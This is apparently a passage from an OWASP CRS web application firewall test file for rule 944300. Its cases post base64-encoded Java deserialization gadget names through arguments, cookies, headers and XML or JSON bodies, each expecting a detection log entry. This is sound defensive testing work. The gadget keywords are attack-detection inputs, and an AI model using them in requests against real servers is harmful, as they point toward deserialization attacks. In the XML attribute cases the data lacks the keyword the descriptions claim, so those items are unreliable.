test_title: 944300-200 + desc: "Argument name includes keyword aW52b2tlcnRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "aW52b2tlcnRyYW5zZm9ybWVy=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-201 + desc: "Cookie test includes keyword aW52b2tlcnRyYW5zZm9ybWVy" + stages: + - stage: 
+ input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=aW52b2tlcnRyYW5zZm9ybWVy + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-202 + desc: "Cookie name includes keyword aW52b2tlcnRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: aW52b2tlcnRyYW5zZm9ybWVy=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-203 + desc: "Request header test includes keyword aW52b2tlcnRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: aW52b2tlcnRyYW5zZm9ybWVy + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-204 + desc: "XML attribute value includes keyword aW52b2tlcnRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-205 + desc: "XML element value includes keyword aW52b2tlcnRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "aW52b2tlcnRyYW5zZm9ybWVy" + output: + log_contains: "id \"944300\"" + - test_title: 944300-206 + desc: "Nested XML element value includes keyword aW52b2tlcnRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "aW52b2tlcnRyYW5zZm9ybWVy" + output: + log_contains: "id \"944300\"" + - test_title: 944300-207 + desc: "Content-Type text/plain includes keyword aW52b2tlcnRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=aW52b2tlcnRyYW5zZm9ybWVy" + output: + log_contains: 
"id \"944300\"" + - test_title: 944300-208 + desc: "Content-Type application/json arg value includes keyword aW52b2tlcnRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"aW52b2tlcnRyYW5zZm9ybWVy\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-209 + desc: "Content-Type application/json arg name includes keyword aW52b2tlcnRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"aW52b2tlcnRyYW5zZm9ybWVy\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-210 + desc: "Argument test includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=Gludm9rZXJ0cmFuc2Zvcm1lcg" + output: + log_contains: "id \"944300\"" + - test_title: 944300-211 + desc: "Argument name includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + 
User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "Gludm9rZXJ0cmFuc2Zvcm1lcg=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-212 + desc: "Cookie test includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=Gludm9rZXJ0cmFuc2Zvcm1lcg + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-213 + desc: "Cookie name includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: Gludm9rZXJ0cmFuc2Zvcm1lcg=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-214 + desc: "Request header test includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: 
"en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: Gludm9rZXJ0cmFuc2Zvcm1lcg + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-215 + desc: "XML attribute value includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-216 + desc: "XML element value includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "Gludm9rZXJ0cmFuc2Zvcm1lcg" + output: + log_contains: "id \"944300\"" + - test_title: 944300-217 + desc: "Nested XML element value includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "Gludm9rZXJ0cmFuc2Zvcm1lcg" + output: + log_contains: "id \"944300\"" + - test_title: 944300-218 + desc: "Content-Type text/plain includes keyword 
Gludm9rZXJ0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=Gludm9rZXJ0cmFuc2Zvcm1lcg" + output: + log_contains: "id \"944300\"" + - test_title: 944300-219 + desc: "Content-Type application/json arg value includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"Gludm9rZXJ0cmFuc2Zvcm1lcg\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-220 + desc: "Content-Type application/json arg name includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"Gludm9rZXJ0cmFuc2Zvcm1lcg\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-221 + desc: "Argument test includes keyword BpbnZva2VydHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=BpbnZva2VydHJhbnNmb3JtZXI" + output: + log_contains: "id \"944300\"" + - test_title: 944300-222 + desc: "Argument name includes keyword BpbnZva2VydHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "BpbnZva2VydHJhbnNmb3JtZXI=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-223 + desc: "Cookie test includes keyword BpbnZva2VydHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=BpbnZva2VydHJhbnNmb3JtZXI + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-224 + desc: "Cookie name includes keyword BpbnZva2VydHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + 
Cookie: BpbnZva2VydHJhbnNmb3JtZXI=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-225 + desc: "Request header test includes keyword BpbnZva2VydHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: BpbnZva2VydHJhbnNmb3JtZXI + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-226 + desc: "XML attribute value includes keyword BpbnZva2VydHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-227 + desc: "XML element value includes keyword BpbnZva2VydHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "BpbnZva2VydHJhbnNmb3JtZXI" + output: + log_contains: "id \"944300\"" + - test_title: 944300-228 + desc: "Nested XML element value includes keyword BpbnZva2VydHJhbnNmb3JtZXI" + stages: + - stage: + input: 
+ dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "BpbnZva2VydHJhbnNmb3JtZXI" + output: + log_contains: "id \"944300\"" + - test_title: 944300-229 + desc: "Content-Type text/plain includes keyword BpbnZva2VydHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=BpbnZva2VydHJhbnNmb3JtZXI" + output: + log_contains: "id \"944300\"" + - test_title: 944300-230 + desc: "Content-Type application/json arg value includes keyword BpbnZva2VydHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"BpbnZva2VydHJhbnNmb3JtZXI\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-231 + desc: "Content-Type application/json arg name includes keyword BpbnZva2VydHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: 
"gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"BpbnZva2VydHJhbnNmb3JtZXI\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-232 + desc: "Argument test includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=cHJvdG90eXBlY2xvbmVmYWN0b3J5" + output: + log_contains: "id \"944300\"" + - test_title: 944300-233 + desc: "Argument name includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "cHJvdG90eXBlY2xvbmVmYWN0b3J5=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-234 + desc: "Cookie test includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=cHJvdG90eXBlY2xvbmVmYWN0b3J5 + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id 
\"944300\"" + - test_title: 944300-235 + desc: "Cookie name includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: cHJvdG90eXBlY2xvbmVmYWN0b3J5=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-236 + desc: "Request header test includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: cHJvdG90eXBlY2xvbmVmYWN0b3J5 + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-237 + desc: "XML attribute value includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-238 + desc: "XML element value includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + 
User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "cHJvdG90eXBlY2xvbmVmYWN0b3J5" + output: + log_contains: "id \"944300\"" + - test_title: 944300-239 + desc: "Nested XML element value includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "cHJvdG90eXBlY2xvbmVmYWN0b3J5" + output: + log_contains: "id \"944300\"" + - test_title: 944300-240 + desc: "Content-Type text/plain includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=cHJvdG90eXBlY2xvbmVmYWN0b3J5" + output: + log_contains: "id \"944300\"" + - test_title: 944300-241 + desc: "Content-Type application/json arg value includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" 
+ method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"cHJvdG90eXBlY2xvbmVmYWN0b3J5\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-242 + desc: "Content-Type application/json arg name includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"cHJvdG90eXBlY2xvbmVmYWN0b3J5\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-243 + desc: "Argument test includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=HByb3RvdHlwZWNsb25lZmFjdG9yeQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-244 + desc: "Argument name includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "HByb3RvdHlwZWNsb25lZmFjdG9yeQ=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-245 + desc: "Cookie test includes keyword 
HByb3RvdHlwZWNsb25lZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=HByb3RvdHlwZWNsb25lZmFjdG9yeQ + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-246 + desc: "Cookie name includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: HByb3RvdHlwZWNsb25lZmFjdG9yeQ=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-247 + desc: "Request header test includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: HByb3RvdHlwZWNsb25lZmFjdG9yeQ + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-248 + desc: "XML attribute value includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" + stages: + - stage: + input: + 